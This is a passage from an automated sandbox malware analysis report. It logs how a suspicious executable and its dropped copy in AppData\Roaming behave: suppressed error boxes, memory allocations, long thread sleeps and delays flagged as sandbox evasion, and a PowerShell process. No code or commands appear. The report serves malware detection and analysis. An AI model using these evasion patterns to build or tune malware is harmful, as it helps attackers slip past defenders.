                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 31F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 8B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 9B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 9D70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: AD70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: B2F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: C2F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: D2F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 2440000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeMemory allocated: 45D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: 8140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: 9140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: 9320000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: A320000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: A960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: B960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: 2B60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: 2DE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMemory allocated: 2BF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598953Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598719Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598279Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597844Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597609Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597500Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 597063Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596250Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594688Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeThread delayed: delay time: 594452Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599890
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599672
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599562
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599125
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 599015
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598906
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598797
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598687
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598578
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598469
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598359
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598246
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598140
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 598031
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597921
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597812
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597702
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597593
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597484
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597375
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597266
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597141
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 597031
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596922
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596812
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596703
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596594
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596484
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596374
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596265
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596155
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 596046
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595937
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595828
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595719
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595609
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595498
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595389
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595281
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595172
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 595062
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 594953
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 594844
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 594734
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeThread delayed: delay time: 594625
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8910Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 621Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9124Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 373Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeWindow / User API: threadDelayed 1551Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeWindow / User API: threadDelayed 8303Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeWindow / User API: threadDelayed 1471
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeWindow / User API: threadDelayed 8393
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 6204Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1428Thread sleep count: 8910 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep count: 621 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -599891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7380Thread sleep count: 1551 > 30Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7380Thread sleep count: 8303 > 30Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -599438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -599313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -599188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -599063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598279s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -598062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -597063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596141s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -596031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -595016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -594906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -594797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -594688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -594563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exe TID: 7376Thread sleep time: -594452s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7408Thread sleep count: 1471 > 30
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7408Thread sleep count: 8393 > 30
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -599015s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe TID: 7404Thread sleep time: -598906s >= -30000s
